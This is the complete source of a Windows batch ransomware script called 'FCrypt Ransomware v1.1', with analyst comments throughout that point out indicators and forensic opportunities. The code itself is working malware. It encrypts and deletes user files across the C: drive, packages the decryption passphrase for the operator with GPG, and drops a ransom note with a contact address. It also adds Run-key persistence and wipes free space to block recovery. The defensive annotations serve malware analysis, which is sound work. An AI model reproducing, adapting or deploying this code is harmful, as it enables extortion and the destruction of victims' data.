- :: Analyst note: entry point of a Windows batch ransomware sample; its own dialog text later in
- :: this listing names it "FCrypt Ransomware v1.1". Flow: :passgen -> :encrypt -> :pkgen -> :END.
- @shift
- @ECHO OFF
- ::Code By FIFCOM
- :: Delayed expansion (!var!) is required by the nested loops in :passgen.
- SetLocal EnableDelayedExpansion
- :: Run-once guard: if the marker file FCRYPT_VICTIM.TMP already exists in the temp directory the
- :: script jumps straight to :END and does nothing. The marker is written near the end of :pkgen,
- :: so its presence on a host is an indicator that a previous run reached that point.
- if not exist "%temp%\FCRYPT_VICTIM.TMP" (goto passgen
- ) else (goto END)
- :: :passgen - builds the passphrase kept in the variable "pass" and stores the output of the
- :: bundled md5 tool for it in FCRYPT_PASSMD5.TMP under the temp directory.
- :passgen
- cls
- :: If the hash file is already present, generation is skipped and the script goes directly to
- :: :encrypt. On that path "pass" is not assigned anywhere in this run.
- if exist "%temp%\FCRYPT_PASSMD5.TMP" goto encrypt
- :: wind and snow only parameterise the loops below: with snow=1 exactly one 10-character string is built.
- set wind=2&& set snow=1
- :: Lookup table x1..x62 holding the characters 0-9, a-z, A-Z.
- for %%1 in (0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do (set /a x+=1&& set x!x!=%%1)
- :: Ten indexes in 1..62 are drawn from cmd's built-in random value and the matching table
- :: characters are concatenated; the result ends up in "id".
- if "%wind%"=="2" (for /l %%1 in (1 1 %snow%)do (for /l %%2 in (1 1 10)do (set /a n%%2=!random! %% 62 +1
- call set 1%%1=!1%%1!%%x!n%%2!%%)
- set id=!1%%1!))
- :: Four more values from the same built-in random source are appended, giving
- :: pass = id-rand1-rand2-rand3-rand4. No other entropy source is visible in this listing.
- set rand1=%random%
- set rand2=%random%
- set rand3=%random%
- set rand4=%random%
- set pass=%id%-%rand1%-%rand2%-%rand3%-%rand4%
- :: Detection/forensics: the plaintext passphrase is passed on the command line of the bundled md5
- :: tool, so process-creation logging that records command lines (Security event 4688 with
- :: command-line auditing, or Sysmon event 1) would capture it.
- :: MYFILES is not set in this script; presumably it is provided by the wrapper that unpacked the
- :: bundled tools - confirm against the dropper.
- %MYFILES%\md5 -d%pass%>"%temp%\$"
- :: The tool output is staged in a file named "$" in the temp directory, copied to
- :: FCRYPT_PASSMD5.TMP, and the staging file is deleted.
- copy "%temp%\$" "%temp%\FCRYPT_PASSMD5.TMP"
- del "%temp%\$" >nul 2>nul
- goto encrypt
- :: :encrypt - walks C:\ recursively and hands every file matching the extension list to a bundled
- :: executable, then removes the local copy of the key hash.
- :encrypt
- cls
- :: Reads the first line of the stored hash file into "passmd5"; this value is the key argument below.
- set /p passmd5=<"%temp%\FCRYPT_PASSMD5.TMP"
- :: Only the C: drive is enumerated. For each match the bundled tool writes "<file>.FCrypt" and the
- :: original is deleted only when the tool exits successfully (the && chain).
- :: Detection: a binary named svchost.exe running from the MYFILES directory rather than from
- :: System32, the key value visible in its command line, and a burst of new *.FCrypt files each
- :: followed by deletion of the original.
- for /r "C:\" %%i in (*.xls *.doc *.xlsx *.docx *.pdf *.rtf *.cdr *.psd *.dwg *.cd *.mdb *.1cd *.dbf *.sqlite *.jpg *.jpeg *.zip *.bmp *.txt *.rar *.mp4 *.sql *.c *.cpp *.java *.php *.asp *.svg *.psd *.bak *.html) do (
- %MYFILES%\svchost.exe -e %passmd5% "%%i" "%%i.FCrypt" >nul 2>nul && del "%%i" >nul 2>nul
- )
- :: The hash file is removed once the walk is finished.
- del /f /q "%temp%\FCRYPT_PASSMD5.TMP" >nul 2>nul
- :: Runs a bundled VBScript through wscript.exe. Its contents are not part of this listing.
- :: NOTE(review): the name suggests shadow-copy deletion - verify against the actual script.
- wscript.exe "%MYFILES%\delsc.vbs"
- goto pkgen
- :: :pkgen - packages the passphrase for the operator, drops the ransom note, sets persistence and
- :: file-association changes, removes traces, writes the run-once marker and starts free-space wiping.
- :pkgen
- cls
- del %temp%\$
- :: Victim record: computer name, user name, version string and the plaintext passphrase are
- :: written to FCRYPT_KEY.TMP in the temp directory.
- echo.computername=%COMPUTERNAME%>"%temp%\FCRYPT_KEY.TMP"
- echo.username=%username%>>"%temp%\FCRYPT_KEY.TMP"
- echo.version=1.1>>"%temp%\FCRYPT_KEY.TMP"
- echo.decryptpass=%pass%>>"%temp%\FCRYPT_KEY.TMP"
- :: The record is encrypted with a bundled gpg.exe to the recipient "FCrypt" after importing a
- :: bundled public key, so only the holder of the matching private key can read it.
- "%MYFILES%\gpg.exe" --import "%MYFILES%\FCRYPT_RSA_PUBLIC_KEY.TMP"
- "%MYFILES%\gpg.exe" -r FCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\FCRYPT_KEY.TMP"
- :: Forensics: the plaintext record is removed with a plain delete here; until the free-space wipe
- :: at the end of this section has run, its content may still be recoverable from disk.
- del "%temp%\FCRYPT_KEY.TMP" >nul 2>nul
- :: Detection: certutil -encode used as a Base64 encoder on a file in the temp directory.
- C:\Windows\System32\certutil -encode "%temp%\FCRYPT_KEY.TMP.gpg" "%temp%\FCRYPT.KEY"
- :: The ransom note is the bundled template FCrypt.txt.tmp with the encoded key blob appended.
- copy /b "%MYFILES%\FCrypt.txt.tmp"+"%temp%\FCRYPT.KEY" "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt"
- :: Removes the GnuPG trust database and the per-user gnupg directory created by the gpg calls.
- del /f /q "%temp%\trustdb.gpg"
- attrib -s -h -r "%AppData%\gnupg\*.*"
- attrib -s -h -r "%AppData%\gnupg"
- del /f /q "%AppData%\gnupg\*.*"
- rmdir /s /q "%AppData%\gnupg"
- copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt
- :: Persistence indicators: three values named FCRYPT1, FCRYPT2 and FCRYPT3 are added under the
- :: current user's Run key; they reference the ransom note path.
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT1" /t REG_SZ /f /d "notepad %temp%\#HELP-DECRYPT-FCRYPT1.1#.txt""
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT2" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
- reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT3" /t REG_SZ /f /d "copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
- :: Cleanup of the encrypted key blob and of files matching *.*xe in the temp directory.
- del /f /q "%temp%\*.gpg"
- del /f /q "%temp%\*.*xe"
- :: File-association indicators: .FCrypt is mapped to a file type FCRYPT whose open command is
- :: mshta.exe with an inline VBScript message box pointing the user to the ransom note.
- echo Y|assoc .FCrypt=FCRYPT
- echo Y|ftype "FCRYPT"=mshta.exe vbscript:Execute^(^"msgbox ^"^" Sorry, this file has been encrypted.^"^"^&vbNewLine^&^"^" More information:^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" #HELP-DECRYPT-FCRYPT1.1#.txt^"^"^&vbNewLine^&vbNewLine^&^"^" [HELP:fcrypt@qq.com]^"^",16,^"^"FCrypt Ransomware v1.1^"^":close^"^)
- echo Y|assoc "FCRYPT"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
- :: Writes the run-once marker that the guard at the top of the script checks.
- echo %random%%random%%random%>%temp%\FCRYPT_VICTIM.TMP
- :: If cipher.exe is present, :cipherw is called once per drive letter A-Z to wipe free space,
- :: after which the script jumps to :END. Detection: cipher.exe started with /w for many drive
- :: letters in sequence from a script host.
- if exist "%systemroot%\system32\cipher.exe" (
- FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :cipherw %%s
- goto END
- :: :cipherw - subroutine; %1 is a drive letter. "cipher /w" overwrites the unused space of that
- :: volume, which removes the remnants of the originals deleted in :encrypt and of the temporary
- :: key files. Incident response: disk images taken before this step completes retain more
- :: recoverable data than images taken afterwards.
- :cipherw
- cipher /w:%1:
- goto:eof
- :: :END - common exit point, reached after a completed run or immediately when the run-once
- :: marker already exists.
- :END
- exit